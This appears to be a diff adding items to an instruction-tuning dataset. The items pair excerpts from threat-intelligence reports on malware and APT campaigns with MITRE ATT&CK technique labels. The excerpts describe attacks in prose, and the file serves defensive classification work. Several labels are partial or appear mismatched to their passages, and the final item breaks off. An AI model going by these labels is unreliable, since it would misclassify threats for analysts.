threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As noted, there are two distinct variants of ServHelper: a \u201ctunnel\u201d variant and a \u201cdownloader\u201d variant. The \u201cdownloader\u201d variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BoomBox proceeds to upload the data above (masquerading as a PDF file) to a dedicated-per-victim-system folder in Dropbox. For demonstration purposes, an example HTTP(s) POST request used to upload the file/data to Dropbox is included below", + "output": "- T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exfiltration over control server channel: data is exfiltrated over the control server channel using a custom protocol - Commonly used port: the attackers used common ports such as port 443 for control server communications - Service execution: registers the implant as a service on the victim\u2019s machine - Automated collection: the implant automatically collects data about the victim and sends it to the control server - Data from local system: local system is discovered and data is gathered - Process discovery: implants can list processes running on the system - System time discovery: part of the data reconnaissance method, the system time is also sent to the control server - File deletion:: malware can wipe files indicated by the attacker", + "output": "- T1119: Automated Collection\n- T1124: System Time Discovery\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The backdoor also collects some rudimentary information about the compromised computer including some basic network adapter information, system version information, and language settings", + "output": "- T1016: System Network Configuration Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShell Cobalt Strike Beacon -\u00a0New payload + new C2 domain - PowerShell Obfuscator -\u00a0All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon\u2019s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper -\u00a0A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper -\u00a0Inspired by known Outlook credentials dumpers. Mimikatz -\u00a0PowerShell and Binary versions, with multiple layers of obfuscation", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Any other command that doesn\u2019t fit the above patterns will be forwarded and processed as an argument to \u2018cmd.exe /c\u2019 and run via the \u2018ShellExecuteW\u2019 API. Additionally, each beacon is accompanied with a screenshot that is initially saved as \u2018scr.jpg\u2019 in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the \u2018uploadsf\u2019 command", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The malware uses the AMAP SDK to get accurate location of infected devices by GPS, mobile network (such as base stations), WiFi and other information. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. All C2 communications are encrypted with the AES algorithm using a key generated by computing five MD5 hashes starting with the key \"\"1qazxcvbnm\"\", and adding a salt value of \u201c.)1/\u201d in each iteration\"", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In order to avoid in-memory scanning during runtime, the payload encrypts all of the function blocks before executing the actual malicious routine. Afterwards, whenever it needs to use a function, it will decrypt the function, execute it, and encrypt the function back again, as can be seen in Figure 4. If a function will not be used on the rest of the execution, it will be scrambled by another mess-up function, as illustrated in Figure 6. The mess-up function muddles up the bytes with random values and makes the input blocks unrecoverable. The purpose of this is to further avoid being detected by a certain cybersecurity solution", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It then executes a new instance of itself in a new process. Also, it will remove the original file via the following command that is executed in a batch script named 'date.bat", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The last one is used by this setup, and in this mode the ransomware encrypts the files on all available mapped network drives", + "output": "- T1486: Data Encrypted for Impact\n- T1564.006: Hide Artifacts - Run Virtual Instance" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We refer to these attacks as MuddyWater due to the confusion in attributing these attacks. Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related. The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. These attacks have also been tracked by several other researchers on Twitter and elsewhere. The activity has been consistent throughout 2017 and, based on our analysis, targets or is suspected to target, entities in the following countries", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the threat actor mapped the network and obtained credentials (through net use), they began to move laterally. The threat actor relied on WMI and PsExec to move laterally and install their tools across multiple assets", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Our dynamic analysis showed Lokibot\u2019s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term \u201cproforma. The malicious attachment was a DOCX, with a file name that also included \u201cproforma\u201d in its pattern. TLP: WHITE https://www.us-cert.gov/tlpCharacteristicsLokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We conducted dynamic analysis to observe network and system behavior once it infected our Windows OS. It starts from the tenth byte in the data section of the initial TCP POST request. The binary\u2019s hardcoded strings provided data about the binary\u2019s characteristics, behavior, and main functionality.Section HeadersFrom the section headers and distribution of each section, the binary appears to be fairly normal. There are no unusual sections, and the size and distribution of the sections, especially .text, mirrors a standard unpacked binary (Figure 6).File Metadata and StringsThe binary is a PEx86 binary, which can be run on both x86 and 64-bit Windows OS. We determined that the binary was packed because we did not see the C2 URL or any signs of being an information stealer (such as an applications list) in the binary strings and resources", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it", + "output": "- T1072: Software Deployment Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As seen in Figure 7, this .NET executable uses a GitHub repository to obtain and execute a downloader. This repository is now gone, but we were able to download a copy of it while it was still available", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mandiant has created a\u202ftask force & initiated a Global Event\u202fto track the Russian invasion of Ukraine. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. There are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. For example, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode base64. The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Summary In the past few months, Unit 42 has observed the Patchwork group, alternatively known as Dropping Elephant and Monsoon, conducting campaigns against targets located in the Indian subcontinent. Patchwork threat actors utilized a pair of EPS exploits rolled into legitimate, albeit malicious, documents in order to propagate their updated BADNEWS payload. The use of weaponized legitimate documents is a longstanding operational standard of this group. The BADNEWS malware payload, which these malicious documents ultimately deliver, has been updated since the last public report in December 2017. These changes to BADNEWS, as well as the use of recent EPS-based exploits, demonstrate that the group are actively updating their toolsets in efforts to stay ahead of the security community. In this posting, we detail our findings and document these changes. Delivery The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities. Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability, however in late January 2018 when, paradoxically, newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability. The lures are primarily documents of interest to Pakistani nuclear organizations and the Pakistani military as can be seen in the images below", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels", + "output": "- T1110.001: Brute Force - Password Guessing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A base working directory will contain the files/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding \u201cWindowsApps", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky\u00a0employs a wide variety of malware such as Gold Dragon, Babyshark, Appleseed, etc. The module meant for exfiltrating files from the endpoint uses a distinct filepath list specified by the threat actors.Organizations must remain vigilant against motivated adversaries that conduct targeted attacks", + "output": "- T1583.006: Acquire Infrastructure - Web Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. DGet \u2014 This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use downloaders or other malware to send the new list to a compromised host. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUNSPOT was identified on disk with a filename of taskhostsvc.exe (SHA256 Hash: c45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168), and internally named taskhostw.exe by its developers. It was likely built on 2020-02-20 11:40:02, according to the build timestamp found in the binary, which is consistent with the currently assessed StellarParticle supply chain attack timeline. StellarParticle operators maintained the persistence of SUNSPOT by creating a scheduled task set to execute when the host boots", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The data is encrypted using a series of XOR and addition operations, followed by decompression using the ZLIB library", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the user account doesn\u2019t have local administrative or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates the admin\u2019s usernames. To identify if privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser-command to show logged on users is also heavily used by them. If such a privileged user was recently active on a server the adversary executes Cobalt Strike\u2019s built-in Mimikatz to dump its password hashes", + "output": "- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The macro sleeps for two seconds and then executes the newly dropped executable. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload. We believe Sofacy used this tool, as the macro within their delivery document closely resembles the macros found within Luckystrike. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this blog post, we provide an in-depth analysis of Linux/Ebury. It is a sophisticated backdoor used to steal OpenSSH credentials and maintain access to a compromised server. According to previous reports, this backdoor has been in the wild for at least two years. Linux/Ebury comes in two different shapes: a malicious library and a patch to the main OpenSSH binaries. The malicious library is a modified version of libkeyutils.so. This shared library is loaded by all OpenSSH executables files such as ssh, sshd and ssh-agent. We will describe how the backdoor works and how the OpenSSH functionalities are hooked", + "output": "- T1554: Compromise Host Software Binary" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. The macro dropped the implant to the disk, setting up persistence mechanisms and eventually executing the payload on the infected endpoint. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. The malicious domain prompts the victim to enter their name and email address to sign up and download a seemingly important \"\"guide on pay and allowance\"", + "output": "- T1608.004: Stage Capabilities - Drive-by Target" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It uses the string 5cd8f17f4086744065eb0992a09e05a2 as its mutex as well as its registry hive in the affected machine. It uses the value\u00a0tcpClient_0 as its HTTP server, where it will receive all stolen information from the infected machine. However, since the value was set to null, all stolen information will be sent to the same C&C server", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object", + "output": "- T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The sample checks that the machine is domain joined and retrieves the domain name before execution continues. A userID is generated by computing the MD5 of a network interface MAC address that is up and not a loopback device, the domain name, and the registry value HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sakula also leverages single-byte XOR encoding to obfuscate various strings and files embedded in the resource section, which are subsequently used for User Account Control (UAC) bypass on both 32 and 64-bit systems. Analysis . CTU researchers 